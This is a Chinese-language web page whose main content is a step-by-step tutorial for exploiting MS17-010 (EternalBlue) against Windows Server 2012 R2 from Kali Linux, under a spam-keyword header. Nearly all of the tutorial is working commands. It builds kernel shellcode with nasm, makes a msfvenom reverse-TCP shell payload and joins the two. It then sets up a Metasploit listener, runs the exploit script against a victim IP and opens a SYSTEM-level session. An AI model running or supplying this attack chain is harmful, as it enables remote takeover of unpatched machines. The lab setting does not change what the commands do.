日日操夜夜添-日日操影院-日日草夜夜操-日日干干-精品一区二区三区波多野结衣-精品一区二区三区高清免费不卡

公告:魔扣目錄網為廣大站長提供免費收錄網站服務,提交前請做好本站友鏈:【 網站目錄:http://www.ylptlb.cn 】, 免友鏈快審服務(50元/站),

點擊這里在線咨詢客服
新站提交
  • 網站:51998
  • 待審:31
  • 小程序:12
  • 文章:1030137
  • 會員:747


Kali Linux實戰篇:Windows Server 2012 R2系統漏洞利用過程

 

 本文將復現MS17010漏洞在windows Server 2012 R2系統下的利用過程,通過使用msf滲透框架生成的shell以及github上的exp生成的二進制文件相拼接,從而生成一個完整的二進制文件,注入到遠程主機的系統進程中。

 

測試環境

kali linux 2017 x32(attacker)

Kali Linux實戰篇:Windows Server 2012 R2系統漏洞利用過程

 

Windows Server 2012 R2(victim)

Kali Linux實戰篇:Windows Server 2012 R2系統漏洞利用過程

 


Kali Linux實戰篇:Windows Server 2012 R2系統漏洞利用過程

 

準備工作


首先下載相關的PoC

下載eternalblue_kshellcode_x64.asm

下載eternalblue_exploit8.py

相關資源在此不顯示,需要者請在評論區留言


操作步驟

1.編譯匯編文件

nasm -f bin eternalblue_kshellcode_x64.asm
Kali Linux實戰篇:Windows Server 2012 R2系統漏洞利用過程

 

此命令在本目錄下生成對應二進制文件eternalblue_kshellcode_x64

2.生成msf的payload

msfvenom -p windows/x64/shell/reverse_tcp -f raw -o shell_msf.bin EXITFUNC=thread LHOST=192.168.254.128 LPORT=4444
Kali Linux實戰篇:Windows Server 2012 R2系統漏洞利用過程

 

-p 指定msf生成的payload的類型

-f payload的類型

-o 輸出的payload的文件名

EXITFUNC 指定這個payload的退出函數

LHOST 本機IP,應使用ifconfig查看kali的IP

LPORT 本機端口,后續payload將連接kali的這個端口

3.組裝匯編文件和payload為專用shellcode

cat eternalblue_kshellcode_x64 shell_msf.bin > reverse_shell.bin
Kali Linux實戰篇:Windows Server 2012 R2系統漏洞利用過程

 

reverse_shell.bin為生成的完整shellcode

注:這種組裝方式的原理可以查看asm文件,最后一行有注釋,后面是自定義的代碼,那么拼接payload之后,payload代碼將被執行

4.在msf上使用exploit/multi/handler模塊

use exploit/multi/handler
Kali Linux實戰篇:Windows Server 2012 R2系統漏洞利用過程

 

5.設置相應的payload,與之前msfvenom命令生成的payload一定要相同

Kali Linux實戰篇:Windows Server 2012 R2系統漏洞利用過程

 

6.設置相應的參數,一定要與msfvenom命令中的參數一致,否則會造成victim藍屏,設置好之后啟動監聽

set EXITFUNC threadset lhost 192.168.254.128run
Kali Linux實戰篇:Windows Server 2012 R2系統漏洞利用過程

 

192.168.254.128是本次實驗的kali系統IP,進行操作時應先使用ifconfig獲取本機的IP

7.啟動利用程序

Python eternalblue_exploit8.py 192.168.254.129 reverse_shell.bin
Kali Linux實戰篇:Windows Server 2012 R2系統漏洞利用過程

 

eternalblue_exploit8.py 利用程序的文件名

192.168.254.129 victim的IP

reverse_shell.bin shellcode文件

8.成功獲取對方的session

利用程序顯示done之后,msf會監聽到一個session

使用以下方法查看已連接的session

sessions -i
Kali Linux實戰篇:Windows Server 2012 R2系統漏洞利用過程

 

9.連入對方機器

sessions -i 1
Kali Linux實戰篇:Windows Server 2012 R2系統漏洞利用過程

 

-i后面的參數為session的Id

此時獲取的已經是system權限

分享到:
標簽:Kali Linux
用戶無頭像

網友整理

注冊時間:

網站:5 個   小程序:0 個  文章:12 篇

  • 51998

    網站

  • 12

    小程序

  • 1030137

    文章

  • 747

    會員

趕快注冊賬號,推廣您的網站吧!
最新入駐小程序

數獨大挑戰2018-06-03

數獨一種數學游戲,玩家需要根據9

答題星2018-06-03

您可以通過答題星輕松地創建試卷

全階人生考試2018-06-03

各種考試題,題庫,初中,高中,大學四六

運動步數有氧達人2018-06-03

記錄運動步數,積累氧氣值。還可偷

每日養生app2018-06-03

每日養生,天天健康

體育訓練成績評定2018-06-03

通用課目體育訓練成績評定